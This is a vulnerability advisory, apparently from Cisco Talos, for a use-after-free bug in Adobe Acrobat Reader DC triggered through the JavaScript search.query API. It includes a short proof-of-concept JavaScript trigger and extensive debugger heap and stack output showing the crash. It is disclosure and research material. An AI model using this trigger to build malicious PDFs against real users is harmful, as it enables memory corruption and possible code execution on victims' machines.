CVE-2021-28562
A use-after-free vulnerability exists in the way Adobe Acrobat Reader DC 2020.013.20074 executes search queries through JavaScript. A specially crafted PDF document can trigger this vulnerability, which can lead to arbitrary code execution. A victim needs to open the malicious file to trigger this vulnerability.
Adobe Acrobat Reader 2020.013.20074
https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.
Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface. Javascript allows manipulation of form fields and other page content in a PDF document.
There exists a vulnerability in a way Adobe Reader is executing search queries through search.query Javascript API. It appears that a concurrency issue can lead to a use after free condition. Following code from the PoC demonstrates triggering this vulnerability:
function main() {
app.activeDocs[0].search.query("test");
getField('txt2').setAction("Format",'f();');
app.activeDocs[0].pageNum = 2;
app.activeDocs[0].search.query("test3");
}
function f() {
app.activeDocs[0].search.query("test2");
}
this.pageNum = 0;
var r = app.setTimeOut("main()",2000);
Above code demonstrates an interesting sequence of events. First, a search dialog is opened by the first search query. An event handler for field txt2 is set to trigger on Format event and call function f. Then, current page is switched to page 2. Switching the page triggers the Format event, but last search query call is initiated before the event handler (function f) is executed. Calling search.query spawns a whole new dialog but yields execution back, so the call from main and from event handler overlap. This can lead to prematurely freeing an object which is later reused. This can be observed in a debugger:
Breakpoint 4 hit
eax=37628fc8 ebx=00000001 ecx=a180629b edx=09c30000 esi=00000000 edi=3ec80f38
eip=687383d1 esp=052fe298 ebp=052fe2ac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
AcroRd32!ixVectorNextHit+0xf3291:
687383d1 3b5df8 cmp ebx,dword ptr [ebp-8] ss:002b:052fe2a4=00000007
0:000> bu AcroRd32!ixVectorNextHit+0xf214f "!heap -p -a esi ; g"
...
...
address 3f1c8fc8 found in
_DPH_HEAP_ROOT @ 9c31000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
432b0b2c: 3f1c8fc8 38 - 3f1c8000 2000
? AcroRd32!CTJPEGThrowException+25ee10
697eabb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
7721245b ntdll!RtlDebugAllocateHeap+0x00000039
77176dd9 ntdll!RtlpAllocateHeap+0x000000f9
77175ec9 ntdll!RtlpAllocateHeapInternal+0x00000179
77175d3e ntdll!RtlAllocateHeap+0x0000003e
74f5f0c7 ucrtbase!_calloc_base+0x00000037
678f4909 AcroRd32!AcroWinMainSandbox+0x00004fd9
678f48c4 AcroRd32!AcroWinMainSandbox+0x00004f94
6873821d AcroRd32!ixVectorNextHit+0x000f30dd
687378b6 AcroRd32!ixVectorNextHit+0x000f2776
687396fc AcroRd32!ixVectorNextHit+0x000f45bc
6873842f AcroRd32!ixVectorNextHit+0x000f32ef
684c1639 AcroRd32!AIDE::PixelPartInfo::operator=+0x00416af9
684c7d6d AcroRd32!AIDE::PixelPartInfo::operator=+0x0041d22d
681b75c1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010ca81
681b6a63 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010bf23
646df9db Search!myASUCSlowercase+0x0000383b
6821d2da AcroRd32!AIDE::PixelPartInfo::operator=+0x0017279a
654a3551 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005b331
65432ab5 EScript!mozilla::HashBytes+0x00042505
65417115 EScript!mozilla::HashBytes+0x00026b65
65411ccf EScript!mozilla::HashBytes+0x0002171f
65410c3c EScript!mozilla::HashBytes+0x0002068c
65410b4c EScript!mozilla::HashBytes+0x0002059c
65410a81 EScript!mozilla::HashBytes+0x000204d1
653f9ed0 EScript!mozilla::HashBytes+0x00009920
65439555 EScript!mozilla::HashBytes+0x00048fa5
6543925a EScript!mozilla::HashBytes+0x00048caa
65438bce EScript!mozilla::HashBytes+0x0004861e
65437979 EScript!mozilla::HashBytes+0x000473c9
654b2351 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0006a131
67964552 AcroRd32!DllCanUnloadNow+0x00020802
...
...
...
(a1c.584): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=052fe05c ebx=1f620fd0 ecx=3f1c8fdc edx=4cc30ff8 esi=3f1c8fc8 edi=68c1c2b8
eip=6791ec4e esp=052fe044 ebp=052fe044 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
AcroRd32!CTJPEGLibInit+0x681e:
6791ec4e 8b5104 mov edx,dword ptr [ecx+4] ds:002b:3f1c8fe0=????????
0:000> !heap -p -a ecx
address 3f1c8fdc found in
_DPH_HEAP_ROOT @ 9c31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
432b0b2c: 3f1c8000 2000
697eae02 verifier!AVrfDebugPageHeapFree+0x000000c2
77212c91 ntdll!RtlDebugFreeHeap+0x0000003e
77173c45 ntdll!RtlpFreeHeap+0x000000d5
77173812 ntdll!RtlFreeHeap+0x00000222
74f5f43b ucrtbase!_free_base+0x0000001b
74f5f408 ucrtbase!free+0x00000018
678f7b79 AcroRd32!AcroWinMainSandbox+0x00008249
68737294 AcroRd32!ixVectorNextHit+0x000f2154
687383ce AcroRd32!ixVectorNextHit+0x000f328e
6873842f AcroRd32!ixVectorNextHit+0x000f32ef
684c7d6d AcroRd32!AIDE::PixelPartInfo::operator=+0x0041d22d
681b75c1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010ca81
681b6a63 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010bf23
646df9db Search!myASUCSlowercase+0x0000383b
6821d2da AcroRd32!AIDE::PixelPartInfo::operator=+0x0017279a
654a3551 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005b331
65432ab5 EScript!mozilla::HashBytes+0x00042505
65417115 EScript!mozilla::HashBytes+0x00026b65
65411ccf EScript!mozilla::HashBytes+0x0002171f
65410c3c EScript!mozilla::HashBytes+0x0002068c
65410b4c EScript!mozilla::HashBytes+0x0002059c
65410a81 EScript!mozilla::HashBytes+0x000204d1
653f9ed0 EScript!mozilla::HashBytes+0x00009920
65439555 EScript!mozilla::HashBytes+0x00048fa5
6543925a EScript!mozilla::HashBytes+0x00048caa
65438bce EScript!mozilla::HashBytes+0x0004861e
65437979 EScript!mozilla::HashBytes+0x000473c9
679de1ff AcroRd32!DllCanUnloadNow+0x0009a4af
6630f3b8 AcroForm!hb_ot_tags_to_script_and_language+0x00093258
6630efb0 AcroForm!hb_ot_tags_to_script_and_language+0x00092e50
66181ae7 AcroForm!hb_set_invert+0x000c9b57
66181986 AcroForm!hb_set_invert+0x000c99f6
Objects are being freed in a loop starting at breakpoint 4. A breakpoint to print heap information before the object is freed is then enabled and we can observe objects sizes and where they were allocated. Finally, an access violation is triggered because of an invalid memory access (with PageHeap enabled). Crash is due to a read instruction on memory pointed to by ecx. From heap output, we can see that the memory belonged to an object of size 0x38 which was freed in the previous loop and that the memory is free at the time of reuse. This constitutes a use after free operation. Since additional code is executed between the free and reuse, memory could be reclaimed and controlled which could lead to further memory corruption and ultimately arbitrary code execution.
(a1c.584): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=052fe05c ebx=1f620fd0 ecx=3f1c8fdc edx=4cc30ff8 esi=3f1c8fc8 edi=68c1c2b8
eip=6791ec4e esp=052fe044 ebp=052fe044 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
AcroRd32!CTJPEGLibInit+0x681e:
6791ec4e 8b5104 mov edx,dword ptr [ecx+4] ds:002b:3f1c8fe0=????????
0:000> !heap -p -a ecx
address 3f1c8fdc found in
_DPH_HEAP_ROOT @ 9c31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
432b0b2c: 3f1c8000 2000
697eae02 verifier!AVrfDebugPageHeapFree+0x000000c2
77212c91 ntdll!RtlDebugFreeHeap+0x0000003e
77173c45 ntdll!RtlpFreeHeap+0x000000d5
77173812 ntdll!RtlFreeHeap+0x00000222
74f5f43b ucrtbase!_free_base+0x0000001b
74f5f408 ucrtbase!free+0x00000018
678f7b79 AcroRd32!AcroWinMainSandbox+0x00008249
68737294 AcroRd32!ixVectorNextHit+0x000f2154
687383ce AcroRd32!ixVectorNextHit+0x000f328e
6873842f AcroRd32!ixVectorNextHit+0x000f32ef
684c7d6d AcroRd32!AIDE::PixelPartInfo::operator=+0x0041d22d
681b75c1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010ca81
681b6a63 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010bf23
646df9db Search!myASUCSlowercase+0x0000383b
6821d2da AcroRd32!AIDE::PixelPartInfo::operator=+0x0017279a
654a3551 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005b331
65432ab5 EScript!mozilla::HashBytes+0x00042505
65417115 EScript!mozilla::HashBytes+0x00026b65
65411ccf EScript!mozilla::HashBytes+0x0002171f
65410c3c EScript!mozilla::HashBytes+0x0002068c
65410b4c EScript!mozilla::HashBytes+0x0002059c
65410a81 EScript!mozilla::HashBytes+0x000204d1
653f9ed0 EScript!mozilla::HashBytes+0x00009920
65439555 EScript!mozilla::HashBytes+0x00048fa5
6543925a EScript!mozilla::HashBytes+0x00048caa
65438bce EScript!mozilla::HashBytes+0x0004861e
65437979 EScript!mozilla::HashBytes+0x000473c9
679de1ff AcroRd32!DllCanUnloadNow+0x0009a4af
6630f3b8 AcroForm!hb_ot_tags_to_script_and_language+0x00093258
6630efb0 AcroForm!hb_ot_tags_to_script_and_language+0x00092e50
66181ae7 AcroForm!hb_set_invert+0x000c9b57
66181986 AcroForm!hb_set_invert+0x000c99f6
0:000> kv
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 052fe044 6873817a 052fe05c 3d229ff0 052fe338 AcroRd32!CTJPEGLibInit+0x681e
01 052fe054 68737bb5 68c1c2b8 4cc30ff8 a180632f AcroRd32!ixVectorNextHit+0xf303a
02 052fe338 687396fc 00000000 6873841a 3ec8cda0 AcroRd32!ixVectorNextHit+0xf2a75
03 052fe35c 6873842f 3ec8cda0 68738420 684c6823 AcroRd32!ixVectorNextHit+0xf45bc
04 052fe380 684c1639 3ec8cda0 30c4cf00 41800af8 AcroRd32!ixVectorNextHit+0xf32ef
05 052fe3a0 684c7d6d 3ec8cda0 00000000 67d009b0 AcroRd32!AIDE::PixelPartInfo::operator=+0x416af9
06 052fe3d4 681b75c1 00000000 00000000 00000001 AcroRd32!AIDE::PixelPartInfo::operator=+0x41d22d
07 052fe3f4 681b6a63 00000000 00000001 a18064bf AcroRd32!AIDE::PixelPartInfo::operator=+0x10ca81
08 052fe4a8 646df9db 052fe4f4 646df9b0 052fe4c8 AcroRd32!AIDE::PixelPartInfo::operator=+0x10bf23
09 052fe4b8 6821d2da 052fe4f4 6821d2b0 052fe5b8 Search!myASUCSlowercase+0x383b
0a 052fe4c8 654a3551 052fe4f4 c790de91 38c44fb8 AcroRd32!AIDE::PixelPartInfo::operator=+0x17279a
0b 052fe5b8 65432ab5 38c44fb8 3645eff8 28ab6fb8 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x5b331
0c 052fe700 65417115 3044af58 00000001 376d70c0 EScript!mozilla::HashBytes+0x42505
0d 052fe774 65411ccf 3044af58 376d70d0 00000001 EScript!mozilla::HashBytes+0x26b65
0e 052fec30 65410c3c 00000000 65410c3c 3044af58 EScript!mozilla::HashBytes+0x2171f
0f 052fec70 65410b4c 3044af58 052fec84 3044af58 EScript!mozilla::HashBytes+0x2068c
10 052fecac 65410a81 3044af58 052fed20 37429ad8 EScript!mozilla::HashBytes+0x2059c
11 052fece0 653f9ed0 3044af58 052fed20 37429ad8 EScript!mozilla::HashBytes+0x204d1
12 052fed30 65439555 3044af58 052fedb0 00000000 EScript!mozilla::HashBytes+0x9920
13 052fedb4 6543925a 3044af58 37429ad8 2a1b6ff0 EScript!mozilla::HashBytes+0x48fa5
14 052fef68 65438bce 21cf6ff0 39040fe0 39082ff0 EScript!mozilla::HashBytes+0x48caa
15 052fefb4 65437979 30312fc0 42a1efb8 3ce20fe0 EScript!mozilla::HashBytes+0x4861e
16 052ff054 654b2351 20934bc8 42a1efb8 408dcfe0 EScript!mozilla::HashBytes+0x473c9
17 052ff098 67964552 416ecfe0 a18070f7 1967cf58 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x6a131
18 052ff0e0 67963eb9 000001ca a1807147 0d878fd0 AcroRd32!DllCanUnloadNow+0x20802
19 052ff150 67963ce7 000001ca 67963c34 a1807197 AcroRd32!DllCanUnloadNow+0x20169
1a 052ff180 678fa715 000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x1ff97
1b 052ff19c 75d0bf1b 00190b36 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xade5
1c 052ff1c8 75d083ea 678fa250 00190b36 00000113 USER32!_InternalCallWinProc+0x2b
1d 052ff2b0 75d07c9e 678fa250 00000000 00000113 USER32!UserCallWinProcCheckWow+0x3aa (FPO: [SEH])
1e 052ff32c 75d07a80 694fd5a0 052ff350 679630d3 USER32!DispatchMessageWorker+0x20e (FPO: [Non-Fpo])
1f 052ff338 679630d3 052ff36c 0d84edd0 0d84edd0 USER32!DispatchMessageW+0x10 (FPO: [Non-Fpo])
20 052ff350 67962dde 052ff36c a18073d3 0d84edd0 AcroRd32!DllCanUnloadNow+0x1f383
21 052ff3c4 67962c09 a18073eb 0d84edd0 00000000 AcroRd32!DllCanUnloadNow+0x1f08e
22 052ff3fc 678f0081 a1807467 0d5abf88 00000000 AcroRd32!DllCanUnloadNow+0x1eeb9
23 052ff470 678efab1 678c0000 00af0000 0d5abf88 AcroRd32!AcroWinMainSandbox+0x751
24 052ff890 00af89e7 678c0000 00af0000 0d5abf88 AcroRd32!AcroWinMainSandbox+0x181
25 052ffc78 00c2e27a 00af0000 00000000 09c4a7bc AcroRd32_exe+0x89e7
26 052ffcc4 76778494 0514a000 76778470 99d6e848 AcroRd32_exe!AcroRd32IsBrokerProcess+0xae05a
27 052ffcd8 771941c8 0514a000 140f174f 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
28 052ffd20 77194198 ffffffff 771af34f 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH])
29 052ffd30 00000000 00af1490 0514a000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
2021-01-23 - Vendor Disclosure
2021-05-11 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.